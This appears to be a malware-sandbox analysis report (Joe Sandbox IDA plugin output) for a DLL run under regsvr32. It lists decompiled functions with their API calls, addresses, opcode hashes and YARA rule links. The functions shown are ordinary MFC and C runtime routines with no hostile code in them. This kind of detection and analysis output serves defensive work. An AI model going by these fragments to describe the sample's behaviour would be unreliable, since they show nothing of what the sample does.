                                                                                                                • Instruction Fuzzy Hash: AA018B3A600924BFD703DB999C48DAF7ABDEF8D682F114129F901DB210EB30DE019B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001CEB9 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E1001CEB9(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E1001729E(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E10019C16(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E1001D39A( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}












                                                                                                                0x1001ceb9
                                                                                                                0x1001cebb
                                                                                                                0x1001cebd
                                                                                                                0x1001cec4
                                                                                                                0x1001cef9
                                                                                                                0x1001cefc
                                                                                                                0x1001ced3
                                                                                                                0x1001ced3
                                                                                                                0x1001ced8
                                                                                                                0x1001cede
                                                                                                                0x1001cef1
                                                                                                                0x1001cf3c
                                                                                                                0x1001cf3c
                                                                                                                0x00000000
                                                                                                                0x1001cf3c
                                                                                                                0x1001cefe
                                                                                                                0x1001cf02
                                                                                                                0x1001cf04
                                                                                                                0x1001cf05
                                                                                                                0x1001cf08
                                                                                                                0x1001cf0e
                                                                                                                0x1001cf11
                                                                                                                0x1001cf29
                                                                                                                0x1001cf29
                                                                                                                0x1001cf2f
                                                                                                                0x1001cf37
                                                                                                                0x00000000
                                                                                                                0x1001cf37
                                                                                                                0x1001cec9
                                                                                                                0x1001cecb
                                                                                                                0x1001cece
                                                                                                                0x1001ced1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ced1
                                                                                                                0x1001cf45

                                                                                                                APIs
                                                                                                                • EnableMenuItem.USER32 ref: 1001CEF1
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • GetFocus.USER32 ref: 1001CF08
                                                                                                                • GetParent.USER32(?), ref: 1001CF16
                                                                                                                • SendMessageA.USER32 ref: 1001CF29
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3849708097-0
                                                                                                                • Opcode ID: 52987512689cd87fb0ec750acb752fdbb78254d950772e2af84ae9505edaf180
                                                                                                                • Instruction ID: 5cf31e8e01a0a06e9da432ca0d9e4f7177fe00446aaafd48b1635c748570ef32
                                                                                                                • Opcode Fuzzy Hash: 52987512689cd87fb0ec750acb752fdbb78254d950772e2af84ae9505edaf180
                                                                                                                • Instruction Fuzzy Hash: BD115B71500615AFD724DF60DC88D1BB7FAFB88315B108A2DF1865A965C770EC85CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10014160 Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E10014160(void* __ecx) {
				long _t10;
				void* _t21;
				void* _t28;

				_t28 = __ecx;
				_t10 = SendMessageA( *(__ecx + 0x1a4), 0xf0, 0, 0);
				_t21 = _t28 + 0x130;
				if(_t10 == 0) {
					E1001D39A(_t21, 1);
					E1001D39A(_t28 + 0xdc, 1);
					_push(1);
				} else {
					E1001D39A(_t21, 0);
					E1001D39A(_t28 + 0xdc, 0);
					_push(0);
				}
				E1001D39A(_t28 + 0x88);
				SendMessageA( *(_t28 + 0x150), 0xf1, 0, 0);
				SendMessageA( *(_t28 + 0xfc), 0xf1, 0, 0);
				return SendMessageA( *(_t28 + 0xa8), 0xf1, 0, 0);
			}






                                                                                                                0x1001416c
                                                                                                                0x1001417a
                                                                                                                0x1001417e
                                                                                                                0x10014184
                                                                                                                0x100141a0
                                                                                                                0x100141ad
                                                                                                                0x100141b2
                                                                                                                0x10014186
                                                                                                                0x10014188
                                                                                                                0x10014195
                                                                                                                0x1001419a
                                                                                                                0x1001419a
                                                                                                                0x100141ba
                                                                                                                0x100141cf
                                                                                                                0x100141e1
                                                                                                                0x100141f7

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 1001417A
                                                                                                                • SendMessageA.USER32 ref: 100141CF
                                                                                                                • SendMessageA.USER32 ref: 100141E1
                                                                                                                • SendMessageA.USER32 ref: 100141F3
                                                                                                                  • Part of subcall function 1001D39A: EnableWindow.USER32(?,00000000), ref: 1001D3A7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$EnableWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1554173715-0
                                                                                                                • Opcode ID: 0c24353fce181e7fa814d434cdea74dde533605d64b0d52f749b46cc6aaf991e
                                                                                                                • Instruction ID: 8308aae739d2d9e2107296dacd73f1b1bc2052d6c29538c5b22a110270b90cac
                                                                                                                • Opcode Fuzzy Hash: 0c24353fce181e7fa814d434cdea74dde533605d64b0d52f749b46cc6aaf991e
                                                                                                                • Instruction Fuzzy Hash: 6E0128353C0701BAFA34F6649C63FD7A294AB94B00F12452AB35AAE0D48EE0B5818665
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001A586 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1001A586(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E10019C3D(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1001A2AB(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1001A586(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}













                                                                                                                0x1001a586
                                                                                                                0x1001a586
                                                                                                                0x1001a58e
                                                                                                                0x1001a594
                                                                                                                0x1001a5f7
                                                                                                                0x1001a5f7
                                                                                                                0x1001a5fb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001a598
                                                                                                                0x1001a59c
                                                                                                                0x1001a5c6
                                                                                                                0x1001a59e
                                                                                                                0x1001a59f
                                                                                                                0x1001a5a4
                                                                                                                0x1001a5a6
                                                                                                                0x1001a5a8
                                                                                                                0x1001a5ab
                                                                                                                0x1001a5ae
                                                                                                                0x1001a5b1
                                                                                                                0x1001a5b4
                                                                                                                0x1001a5b5
                                                                                                                0x1001a5b5
                                                                                                                0x1001a5a6
                                                                                                                0x1001a5cc
                                                                                                                0x1001a5d0
                                                                                                                0x1001a5d3
                                                                                                                0x1001a5d5
                                                                                                                0x1001a5d7
                                                                                                                0x1001a5e9
                                                                                                                0x1001a5e9
                                                                                                                0x1001a5d7
                                                                                                                0x1001a5f1
                                                                                                                0x1001a5f1
                                                                                                                0x1001a600

                                                                                                                APIs
                                                                                                                • GetTopWindow.USER32(00000000), ref: 1001A594
                                                                                                                • GetTopWindow.USER32(00000000), ref: 1001A5D3
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 1001A5F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2353593579-0
                                                                                                                • Opcode ID: d7358cc00cbd99a1976692eb103cece243867016612caeb8318c002da2529d05
                                                                                                                • Instruction ID: 63638fef5a96a07e09e5da3520ad298f1a6d341acad3fdbfcdb56d5f1322e381
                                                                                                                • Opcode Fuzzy Hash: d7358cc00cbd99a1976692eb103cece243867016612caeb8318c002da2529d05
                                                                                                                • Instruction Fuzzy Hash: E901E936044A1ABBCF539F91DC04E9F3BAAEF0A290F014014FE0059021D736CAE1EFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10047233 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10047233(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E10046B30(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E10046C1C(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E1004713B(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E10047082(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}







                                                                                                                0x10047233
                                                                                                                0x10047236
                                                                                                                0x1004723c
                                                                                                                0x100472af
                                                                                                                0x00000000
                                                                                                                0x10047243
                                                                                                                0x10047243
                                                                                                                0x10047246
                                                                                                                0x10047261
                                                                                                                0x10047264
                                                                                                                0x10047284
                                                                                                                0x10047296
                                                                                                                0x10047266
                                                                                                                0x10047266
                                                                                                                0x10047269
                                                                                                                0x00000000
                                                                                                                0x1004726b
                                                                                                                0x1004727d
                                                                                                                0x1004727d
                                                                                                                0x10047269
                                                                                                                0x100472b4
                                                                                                                0x100472b8
                                                                                                                0x10047248
                                                                                                                0x10047260
                                                                                                                0x10047260
                                                                                                                0x10047246

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                • Instruction ID: bb190076197b3c47cc7c8057e8d98d2e68558706b181164bb56e9f5d22d89dcf
                                                                                                                • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                • Instruction Fuzzy Hash: 3A01897640004ABBCF129E84CD41CEE3F62FB09284F298565FE1898131D377DAB1AF86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10019F45 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10019F45(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E10019F45(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E10019C16(_t13, _t14, _t18);
						}
						_t10 = E10019C3D(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E10019F45(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}













                                                                                                                0x10019f45
                                                                                                                0x10019f45
                                                                                                                0x10019f50
                                                                                                                0x10019f56
                                                                                                                0x10019f5c
                                                                                                                0x10019f60
                                                                                                                0x10019f90
                                                                                                                0x10019f93
                                                                                                                0x10019fb0
                                                                                                                0x10019fb0
                                                                                                                0x10019fb2
                                                                                                                0x10019fb4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10019f9e
                                                                                                                0x10019fa3
                                                                                                                0x10019fa5
                                                                                                                0x10019faa
                                                                                                                0x00000000
                                                                                                                0x10019faa
                                                                                                                0x00000000
                                                                                                                0x10019fa5
                                                                                                                0x10019f62
                                                                                                                0x10019f67
                                                                                                                0x10019f79
                                                                                                                0x10019f7d
                                                                                                                0x10019f7e
                                                                                                                0x00000000
                                                                                                                0x10019f80
                                                                                                                0x10019f87
                                                                                                                0x10019f8c
                                                                                                                0x10019f8e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10019f69
                                                                                                                0x10019f70
                                                                                                                0x10019f77
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10019f77
                                                                                                                0x10019f67
                                                                                                                0x10019fb9
                                                                                                                0x10019fb9

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 10019F50
                                                                                                                • GetTopWindow.USER32(00000000), ref: 10019F63
                                                                                                                  • Part of subcall function 10019F45: GetWindow.USER32(00000000,00000002), ref: 10019FAA
                                                                                                                • GetTopWindow.USER32(?), ref: 10019F93
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 369458955-0
                                                                                                                • Opcode ID: 38bd6319779c25a45ee2896bc22a6c4c08e6ae0c7078cc5ba6acd4dcbea4d3c2
                                                                                                                • Instruction ID: 7b5cadcf030ea57ab621abf36d6a866f09d7c641b742e1b5f6ade8078567b29c
                                                                                                                • Opcode Fuzzy Hash: 38bd6319779c25a45ee2896bc22a6c4c08e6ae0c7078cc5ba6acd4dcbea4d3c2
                                                                                                                • Instruction Fuzzy Hash: 3D016D3640566ABBDB22EF62CC04F8F3A99EF442E0F014038FD15DE125D731D9929AE5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002C612 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 50%
                                                                                                                			E1002C612(short* _a4) {
				char* _v0;
				int _v8;
				int _v16;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t6;
				char* _t7;
				void* _t12;
				char* _t13;
				void* _t15;
				void* _t16;
				short* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					__imp__#7(_t20, _t16, _t12);
					_v8 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_t13 = _t7;
					__eflags = _t13;
					if(__eflags == 0) {
						E1001726A(_t13, _t15, WideCharToMultiByte, 0, __eflags);
					}
					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
					return _t13;
				}
				return 0;
			}


















                                                                                                                0x1002c614
                                                                                                                0x1002c61d
                                                                                                                0x1002c626
                                                                                                                0x1002c63a
                                                                                                                0x1002c63e
                                                                                                                0x1002c642
                                                                                                                0x1002c646
                                                                                                                0x1002c64c
                                                                                                                0x1002c64e
                                                                                                                0x1002c650
                                                                                                                0x1002c652
                                                                                                                0x1002c652
                                                                                                                0x1002c665
                                                                                                                0x00000000
                                                                                                                0x1002c66a
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • SysStringLen.OLEAUT32(?), ref: 1002C626
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002C903,00000000,00000018,1002CC49), ref: 1002C63E
                                                                                                                • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002C646
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002C903,00000000,00000018,1002CC49), ref: 1002C665
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3384502665-0
                                                                                                                • Opcode ID: 1177553cbf17203df43465aeb6c3ba90d8ab090d0b4f3017ddf2c7f1133e5107
                                                                                                                • Instruction ID: 8bfdf84d9a1f1fe7d8b87919ce8c5274f58af7d09d522709d96be8513beb56e0
                                                                                                                • Opcode Fuzzy Hash: 1177553cbf17203df43465aeb6c3ba90d8ab090d0b4f3017ddf2c7f1133e5107
                                                                                                                • Instruction Fuzzy Hash: 15F030721062787F93215BA69C8CCABBFDCFF8F2E5B11062AF94992110D6759900C6F1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10044673 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E10044673(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x10069048);
				E1003D578(__ebx, __edi, __esi);
				_t31 = E10042B23(__edx, __edi, _t35);
				_t15 =  *0x1006e504; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1004329E(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x1006e408; // 0xef14a8
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x1006dfe0;
								if(__eflags != 0) {
									_push(_t33);
									E1003B59D(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x1006e408; // 0xef14a8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x1006e408; // 0xef14a8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E1004470E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10040B91(_t25, _t29, _t31, 0x20);
				}
				return E1003D5BD(_t33);
			}










                                                                                                                0x10044673
                                                                                                                0x10044673
                                                                                                                0x10044673
                                                                                                                0x10044673
                                                                                                                0x10044675
                                                                                                                0x1004467a
                                                                                                                0x10044684
                                                                                                                0x10044686
                                                                                                                0x1004468e
                                                                                                                0x100446af
                                                                                                                0x100446b5
                                                                                                                0x100446b9
                                                                                                                0x100446bc
                                                                                                                0x100446bf
                                                                                                                0x100446c5
                                                                                                                0x100446c7
                                                                                                                0x100446c9
                                                                                                                0x100446cc
                                                                                                                0x100446d2
                                                                                                                0x100446d4
                                                                                                                0x100446d6
                                                                                                                0x100446dc
                                                                                                                0x100446de
                                                                                                                0x100446df
                                                                                                                0x100446e4
                                                                                                                0x100446dc
                                                                                                                0x100446d4
                                                                                                                0x100446e5
                                                                                                                0x100446ea
                                                                                                                0x100446ed
                                                                                                                0x100446f3
                                                                                                                0x100446f7
                                                                                                                0x100446f7
                                                                                                                0x100446fd
                                                                                                                0x10044704
                                                                                                                0x10044696
                                                                                                                0x10044696
                                                                                                                0x10044696
                                                                                                                0x1004469b
                                                                                                                0x1004469f
                                                                                                                0x100446a4
                                                                                                                0x100446ac

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10042B23: __getptd_noexit.LIBCMT ref: 10042B24
                                                                                                                  • Part of subcall function 10042B23: __amsg_exit.LIBCMT ref: 10042B31
                                                                                                                • __amsg_exit.LIBCMT ref: 1004469F
                                                                                                                • __lock.LIBCMT ref: 100446AF
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 100446CC
                                                                                                                • InterlockedIncrement.KERNEL32(00EF14A8), ref: 100446F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2880340415-0
                                                                                                                • Opcode ID: 734dba7c6c98470b2c8f0df44824f53dd19183195a7be9b8e214148305e01f9d
                                                                                                                • Instruction ID: bdd71656707cbe46e15d2e26963bf9bd323e1d49f1515a5aa100c235d06d7cbf
                                                                                                                • Opcode Fuzzy Hash: 734dba7c6c98470b2c8f0df44824f53dd19183195a7be9b8e214148305e01f9d
                                                                                                                • Instruction Fuzzy Hash: 27016D39901B219BEB01DB64994974977E1EF0A758F230126E810E7290CF74AD42CBDA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10018321 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10018321(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t21;
				void* _t22;
				void* _t23;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E1002D888(_t21, _t22, _t23, _a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}










                                                                                                                0x1001832b
                                                                                                                0x10018390
                                                                                                                0x00000000
                                                                                                                0x10018333
                                                                                                                0x10018333
                                                                                                                0x10018339
                                                                                                                0x00000000
                                                                                                                0x10018356
                                                                                                                0x1001835f
                                                                                                                0x1001836b
                                                                                                                0x10018371
                                                                                                                0x10018377
                                                                                                                0x1001837b
                                                                                                                0x1001837b
                                                                                                                0x10018385
                                                                                                                0x00000000
                                                                                                                0x1001838d
                                                                                                                0x10018339

                                                                                                                APIs
                                                                                                                • GetObjectA.GDI32(00000000,0000000C,?), ref: 1001835F
